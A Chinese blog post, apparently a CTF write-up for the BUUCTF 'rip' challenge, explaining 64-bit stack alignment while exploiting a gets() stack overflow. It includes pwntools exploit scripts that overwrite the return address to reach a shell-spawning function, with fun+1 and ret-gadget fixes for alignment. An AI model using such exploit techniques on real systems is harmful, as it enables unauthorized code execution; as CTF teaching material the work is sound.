用简单的例子讲64位程序的栈空间对齐

原创 已于 2024-03-25 08:10:50 修改 · 1.6k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-03-24 21:19:44 首次发布
本文详细描述了解决Buuctf第二题中利用栈溢出攻击的步骤,包括分析溢出点、利用函数fun、处理栈对齐问题,以及提供两种解决方案,最终通过动态调试实现payload的构造和执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里以Buuctf的第二题:rip(https://buuoj.cn/challenges#rip)为例子

文件信息

首先按照正常流程看看这个文件的属性和安全机制:

可以看到是一个没有开启任何安全机制的x86架构64位小段ELF可执行程序

溢出点分析

之后我们扔进ida看看程序逻辑:

是一个很简单的栈溢出程序,有典型危险函数gets,且没有对用户的输入进行过滤

并且发现了可利用函数fun()

其地址为0x401186

之后我们动态调一下,确定溢出所需的垃圾数据量:

我们将断点打在main()函数上

按r跑起来,之后一路n到gets函数:

我们这一次先步过,可以看到我们rbp和需要覆盖的返回地址0x7fffffffdf68-0x7fffffffdf6f

我们从rsp开始到0x7fffffffdf68的距离是24字节,也就是我们写24字节就可以覆盖,按r重新开始程序,然后我们填入16个a+8个b+个c:

我们发现原本填入0x7fffffffdf68的应该是8个c,但是多了一个b,依据动态调试的结果为主,我们最终的填充数据是23个字节

栈对齐

下面涉及到栈对齐的问题,在这里先科普一个小点:

64位ubuntu系统调用system函数时是需要栈对齐的。再具体一点就是64位下system函数有个movaps指令,这个指令要求内存地址必须16字节对齐,说简单一点就是在将要调用system函数的时候,rsp指向的地址末尾需是0

在64位程序中,栈地址的最后一位不是0就是8

我们使用下面的代码来调试:

from pwn import *

io = gdb.debug('./pwn1','break main')

#io = process('./pwn1')  

elf = ELF('./pwn1')

fun = elf.symbols['fun']

payload = b'a'* 23 + p64(fun)

print(payload)

io.sendline(payload)

io.interactive()

我们一直单步执行到system调用,我们发现rsp指向的空间地址是以8结尾的,所以不行

这里有两种解决方式,我们发现fun函数的第一句是对栈空间的操作,我们跳过这条指令就实现了对栈的少一步写入,rsp指针的地址末尾就是0

还有一种是中间加一个ret指令的地址,本来是直接执行fun,现在我们将他写入栈中然后pop eip(ret)一下,此时一方面是对栈空间读操作了一下,rsp会变,另一方面刚好把fun的地址pop到eip去执行:

payload = b'a'* 23 + p64(addr_ret) + p64(fun)

这里推荐第二种,ret指令基本不可能找不到,但是本人比较懒,这里就使用第一种让大家看看(这里将上一个程序的fun后+1),可以看到rsp指向的地址是0结尾:

这是最后的exp:

from pwn import *

#io = gdb.debug('./pwn1','break main')

io = process('./pwn1')  

elf = ELF('./pwn1')

fun = elf.symbols['fun']

payload = b'a'* 23 + p64(fun + 1)

print(payload)

io.sendline(payload)

io.interactive()

执行:

为萤
关注
x64指针(rsp)不对齐引起的 segmentation fault, 以及 c 语言可变参数的一个细节
BeautifulCarol的博客
05-03 617
在 Windows + VS2022 上做了同样的测试,结果正常没有报异常,原因是 VC 编译器的 printf 函数实现不同,没有一上来就将 xmm 寄存器入。由上图可以看到是在调用 printf 函数时报错的,而操作 xmm0 xmm1 这些寄存器需要 rsp/rbp 16字节对齐,查看一下寄存器的值,果然是没有对齐。但是调用其它函数却没有,分析 printf 的汇编发现有一条 test al, al 指令判断 al 是否为 0,是刚跳转,不是则 xmm0 ~ xmm7 入
【汇编语言与计算机系统结构笔记09】程序,(x86-32)过程调用,帧,寄存器使用惯例
记录学习痕迹的公众号:Piper蛋窝
01-14 651
本次笔记内容: 10.与过程调用的机器表示-1 11.与过程调用的机器表示-2 12.实验
cortex-m3 的8字节对齐
weixin_30249203的博客
06-27 461
一、什么是对齐的字节对齐,实际是指顶指针须是某字节的整数倍。因此下边对系统与MSP,任务与PSP,对齐与SP对齐 这三对概念不做区分。另外下文提到编译器的时候,实际上是对编译器汇编器连接器的统称。 之前对的8字节对齐理解的不透,就在网上查了好多有关字节对齐、还有一些ARM对齐伪指令的资料信息,又做了一些实验,把这些零碎的信息拼接在一起,总觉得理解透这个问题的话得长篇大论了。...
Linux 64对齐 通信,x86_64 Linux 运行时的字节对齐
weixin_42522676的博客
05-13 555
前言C语言的过程调用机制(即函数之间的调用)的一个关键特性(起始大多数编程语言也是如此)都是使用了数据结构提供的后进先出的内存管理原则。每一个函数的栈空间被称为帧,一个帧上包含了保存的寄存器、分配给局部变量的空间以及传递给要调用函数的参数等等。一个基本的结构如下图所示:但是,有一点需要引起注意的是,过程调用的参数是通过来传递的,并且分配的局部变量也在上,那么对于不同字节长度的参数或变量...
HIT·CSAPP buflamb 64对齐相关问题解释
qq_22607673的博客
04-22 1160
如图
ROP 中的对齐
blog
12-17 824
在 ROP(Return-Oriented Programming)的上下文中,维护对齐变得尤为重要,因为 ROP 链依赖于连续的函数返回指令(以及其他 gadgets)来执行预期的逻辑。如果对齐不正确,可能会导致 ROP 链中断或无法按预期执行,甚至可能引发异常或错误行为。因此,ROP 链的设计者需要精心挑选和排列 gadgets,以确保在每次操作后仍然对齐,这增加了 ROP 攻击的难度和复杂性。
C语言对齐问题,含结构体、内存以及对齐
10-08
C语言对齐问题主要涉及到程序在内存中如何存储数据,特别是结构体、内存以及域的对齐。本文将详细介绍这些内容。 首先,对齐是现代计算机内存管理的一种方式,它要求数据按照一定的内存地址对齐访问。这种对齐...
对齐
最新发布
04-18
以上例子展示了如何利用 NASM 组织一段简单程序片段强制设定初始 SP 地址使其符合预期规格要求[^3]。 --- ### 总结 综上所述,无论是从理论角度还是实践角度来看,“对齐”都是构建健壮可靠软件不可或缺的一...
C/C++编程笔记:C语言对齐问题【结构体、内存以及对齐
致力于C语言C++知识分享!
06-09 750
引言 考虑下面的结构体定义: 假设这个结构体的成员在内存中是紧凑排列的,且c1的起始地址是0,则s的地址就是1,c2的地址是3,i的地址是4。 现在,我们编写一个简单程序: 运行后输出: 为什么会这样?这就是字节对齐导致的问题。 本文在参考诸多资料的基础上,详细介绍常见的字节对齐问题。因成文较早,资料来源大多已不可考,敬请谅解。 一,什么是字节对齐 现代计算机中,内存空间按照字节划分,理论上可以从任何起始地址访问任意类型的变量。但实际中在访问特定类型变量时经常在特定的内存地址访
Linux溢出例子详解
bitsec的专栏
07-13 7794
注:本例中使用的例子为看雪论坛帖子中的例子(https://bbs.pediy.com/thread-216868.htm),结合自己的理解,进行更深入的详细的解,更有利于理解细节例子中的代码如下: //vuln.c #include <stdio.h> #include &amp
内存对齐 详细介绍内存对齐的原理
11-17
关于内存对齐的很详细的解析.内容有什么是内存对齐,为什么需要内存对齐,编译器对内存对齐的处理,内存对齐等,并附有验证代码.值得一看.
关于对齐(stack alignment)
天高云淡
11-22 6368
手册上介绍:The stack pointer for a stack segment should be aligned on 16-bit (word) or 32-bit (double-word)boundaries, depending on the width of the stack segment. The D flag in the segment descriptorfor the current code segment sets the stack-segment width (re
关于ubuntu18版本以上调用64程序中的system函数的对齐问题
weixin_53394081的博客
03-06 554
对齐 最近在使用ubuntu做64的pwn题时遇到了一些问题,由于自己刚入门不久,不能及时发现问题,后来在师傅指点下才知道遇到了64中的对齐问题,具体看以下博客 https://www.cnblogs.com/ZIKH26/articles/15996874.html 注意要找ret,加到rop链中,覆盖ret地址就行,说垃圾数据后面也对 ROPgadget使用 https://blog.youkuaiyun.com/weixin_45556441/article/details/114631043
数据结构对齐对齐 对齐
weixin_30268921的博客
09-24 568
good:https://hps.vi4io.org/_media/teaching/wintersemester_2013_2014/epc-14-haase-svenhendrik-alignmentinc-presentation.pdf 本节疑惑的原因:在读Hotspot源码时: https://bugs.openjdk.java.net/bro...
d的对齐问题
个人进步之路
01-04 202
d的对齐问题
c++ summary对齐 对齐字节 mpreferred-stack-boundary
ResumeProject的博客
12-27 565
在线或者使用GDB的disassemble查看汇编代码中临时变量分配的空间,发现临时空间大小为16的倍数。这是由 GCC的对齐值, -mpreferred-stack-boundary 决定的。
x86_64 Linux 运行时的字节对齐
weixin_30670151的博客
08-11 694
前言 C语言的过程调用机制(即函数之间的调用)的一个关键特性(起始大多数编程语言也是如此)都是使用了数据结构提供的后进先出的内存管理原则。每一个函数的栈空间被称为帧,一个帧上包含了保存的寄存器、分配给局部变量的空间以及传递给要调用函数的参数等等。一个基本的结构如下图所示: 但是,有一点需要引起注意的是,过程调用的参数是通过来传递的,并且分配的局部变量也在上,那么对于不同字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值